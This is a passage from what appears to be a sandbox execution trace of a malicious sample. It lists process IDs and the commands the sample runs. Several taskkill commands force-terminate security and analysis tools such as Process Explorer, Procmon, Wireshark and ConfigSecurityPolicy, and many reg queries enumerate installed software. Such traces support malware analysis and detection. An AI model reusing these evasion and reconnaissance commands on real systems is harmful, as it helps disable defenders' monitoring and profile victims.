C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1332
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1372
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:1568
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:1764
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:932
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:1592
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:1948
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1864
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1764
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:680
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:2088
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2056
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2108
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:2128
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:2156
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2168
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2204
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:2224
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:2256
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2280
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2292
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:2344
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:2364
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2384
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:2412
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:2472
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2460
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2504
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:2532
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:2544
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2556
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2568
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:2608
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:2628
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2652
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵PID:2664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:2684
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2696
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:2720
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:2780
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:2708
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2792
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:2804
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:2816
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:2828
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2856
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵PID:2872
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:2884
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2900
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:2916
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:2948
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2960
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:2980
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:2992
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3016
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:3052
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:612
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2116
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:2188
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:2232
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2224
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:2308
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:2368
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2364
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:2416
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:2412
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2468
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:2548
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:2580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1504
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:1852
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:1048
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:572
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:1004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:2040
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2596
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:1824
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:1836
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1888
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:1840
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:1376
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1416
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:756
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:1492
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1584
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:1204
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:940
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2080
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:1792
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:1676
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:2676
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:2044
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1940
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:1864
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:2692
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2716
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:2268
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:2436
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2748
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:2752
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:2020
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1796
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:2144
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:2276
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2172
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:2328
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:1556
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:240
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:2008
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:2196
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2724
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:2100
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:2216
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2564
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:2672
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:2720
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2788
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:2812
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:2804
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2816
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:2872
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:2892
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2908
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:2952
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:2916
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2972
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:2976
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:3008
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3024
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:3044
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:3068
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3052
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:1948
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:2064
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2936
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:2680
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:2560
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2128
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:2932
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:2768
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2464
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:2164
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:2236
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2288
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:2868
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:2828
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2232
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:2264
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:2764
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2712
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:2732
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:2344
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:828
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:2400
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:752
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2604
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:2012
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:2480
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2408
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:2476
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:2536
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2548
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:2580
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:1524
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1048
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:1004
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1284
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:1120
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:1836
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1388
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:2016
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:2592
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1952
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:1696
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:2612
-
-